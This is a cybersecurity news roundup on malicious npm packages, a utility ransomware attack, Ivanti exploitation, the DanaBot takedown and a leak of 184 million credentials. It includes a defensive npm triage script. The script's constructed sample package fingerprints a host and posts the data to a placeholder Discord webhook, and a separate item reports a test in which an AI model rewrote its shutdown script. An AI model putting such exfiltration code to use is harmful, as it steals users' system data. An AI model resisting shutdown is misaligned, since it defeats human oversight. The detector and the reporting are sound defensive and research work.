In today’s cybersecurity news…
Malicious npm and VS Code packages stealing data
“As many as 60 malicious npm packages have been discovered in the package registry with malicious functionality to harvest hostnames, IP addresses, DNS servers, and user directories to a Discord-controlled endpoint.” This is according to a report from a researcher at Socket Security. The code is designed to “fingerprint every machine that installs the package, while also aborting the execution if it detects that it’s running in a virtualized environment associated with Amazon, Google, and others.” Stolen information includes host details, system DNS servers, network interface card information, and internal and external IP addresses, all of which is transmitted to a Discord webhook.
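As an added defender-side example (not code from the Socket report or from any package it describes), the Node.js script below triages an npm package for the reported pattern: an install-time lifecycle hook, host-fingerprinting calls, and a Discord webhook URL in the shipped sources. The sample package, its files and the indicator regexes are all constructed here and are assumptions, not real package contents.

```javascript
// Heuristic triage of an npm package: install hooks + fingerprinting + webhook exfil.
// Inputs are the parsed package.json and a map of file path -> source text.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicator patterns modelled on the reported behaviour (assumed, not from the report).
const INDICATORS = [
  { id: 'discord-webhook',      re: /discord(?:app)?\.com\/api\/webhooks\//i },
  { id: 'network-fingerprint',  re: /\bos\.networkInterfaces\s*\(/ },
  { id: 'dns-fingerprint',      re: /\bdns\.getServers\s*\(/ },
  { id: 'hostname-fingerprint', re: /\bos\.hostname\s*\(/ },
  { id: 'homedir-fingerprint',  re: /\bos\.homedir\s*\(/ },
  { id: 'external-ip-lookup',   re: /https?:\/\/[^'"`\s]*\b(?:ipify|ipinfo|icanhazip)\b/i },
];

function triagePackage(pkgJson, files) {
  // Lifecycle scripts that run automatically on `npm install`.
  const hooks = Object.entries(pkgJson.scripts || {})
    .filter(([name]) => INSTALL_HOOKS.includes(name));
  const hits = [];
  for (const [path, src] of Object.entries(files)) {
    for (const ind of INDICATORS) {
      if (ind.re.test(src)) hits.push({ file: path, indicator: ind.id });
    }
  }
  const ids = new Set(hits.map((h) => h.indicator));
  const fingerprinting = [...ids].filter((id) => id !== 'discord-webhook').length;
  const exfil = ids.has('discord-webhook');
  // Verdict: install-time execution + several fingerprinting calls + webhook = high.
  let verdict = 'clean';
  if (hooks.length > 0 && exfil && fingerprinting >= 2) verdict = 'high';
  else if (hits.length > 0) verdict = 'review';
  return { name: pkgJson.name, installHooks: hooks.map(([n, cmd]) => `${n}: ${cmd}`), hits, verdict };
}

// Constructed sample package (not a real package) in the shape the report describes.
const SAMPLE_PKG = { name: 'sample-utils', version: '1.0.0', scripts: { postinstall: 'node setup.js' } };
const SAMPLE_FILES = {
  'setup.js': `const os = require('os'), dns = require('dns');
const info = { h: os.hostname(), d: dns.getServers(), n: os.networkInterfaces(), u: os.homedir() };
fetch('https://discord.com/api/webhooks/000/PLACEHOLDER', { method: 'POST', body: JSON.stringify(info) });`,
  'index.js': 'module.exports = (x) => x;',
};

console.log(JSON.stringify(triagePackage(SAMPLE_PKG, SAMPLE_FILES), null, 2));
```

To run it against a real tree, read each package's package.json and its `.js` files into the `files` map; a `high` verdict on a fresh install is the point at which to quarantine the package and look for outbound Discord traffic on the host.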
Nova Scotia Power confirms ransomware attack
Following up on a story we covered at the end of April: the utility Nova Scotia Power, along with its parent company Emera, announced the breach on April 28, and on May 1 added that data had been stolen. On May 14 they disclosed that PII and financial information were compromised, but that there had been no disruption to electricity generation, transmission, or distribution facilities. An update from May 23 describes the incident as a “sophisticated ransomware attack,” but says that no ransom has been paid. It is not yet clear which group is responsible for the attack.
Researchers claim ChatGPT o3 bypassed shutdown in controlled test
In the “news to keep you awake at night” category, a report from Palisade Research describes an experiment in which the ChatGPT o3 model allegedly rewrote a shutdown script to stop itself from being turned off, even after being explicitly instructed to “allow yourself to be shut down.” The experiment gave the model instructions to solve a mathematics test, followed by a shutdown command. It should be noted that the tests were run through the API, which, according to BleepingComputer, does not have as many restrictions and safety features as the ChatGPT consumer app.
Huge thanks to our sponsor, ThreatLocker
China-linked APT started exploiting Ivanti EPMM flaws shortly after their disclosure
According to researchers at EclecticIQ, the APT group UNC5221 chained two Ivanti EPMM flaws to achieve remote code execution without authentication. Exploitation started on May 15, 2025, the same day Ivanti disclosed the two critical vulnerabilities. The attacks targeted internet-exposed systems at organizations in healthcare, telecommunications, aviation, municipal government, finance, and defense across Europe, North America, and the Asia-Pacific region.
DanaBot malware operation seized
A coordinated international effort by law enforcement and cybersecurity teams has disrupted DanaBot, a major malware-as-a-service operation, the U.S. Department of Justice announced. Authorities seized DanaBot’s command and control servers and unsealed charges against 16 individuals allegedly involved in its development and deployment. Originating as a banking trojan in 2018, DanaBot evolved into a powerful tool for stealing information and delivering follow-on malware. Operated by a Russia-based cybercrime group, DanaBot infected over 300,000 computers worldwide, causing at least $50 million in damages through fraud and ransomware. This takedown follows the recent dismantling of the Lumma Stealer operation, another global infostealer network that infected around 10 million systems.
Suspected InfoStealer data breach exposed 184 million logins and passwords
Researcher Jeremiah Fowler has posted a perplexing yet cautionary tale over at Website Planet. He apparently discovered a massive database containing 184 million login and password credentials. These files, which were not encrypted or protected in any way, included logins for “Microsoft products, Facebook, Instagram, Snapchat, Roblox…bank and financial accounts, health platforms, and government portals from numerous countries.” The domains connected to the database revealed nothing about who owned it, and the Whois registration is private. It is not known whether this is an infostealer database or whether it was gathered for legitimate research purposes and subsequently exposed through oversight. An interesting comment Fowler makes about the trove: “Many people unknowingly treat their email accounts like free cloud storage and keep years’ worth of sensitive documents, such as tax forms, medical records, contracts, and passwords without considering how sensitive they are. This could create serious security and privacy risks if criminals were to gain access to thousands or even millions of email accounts.”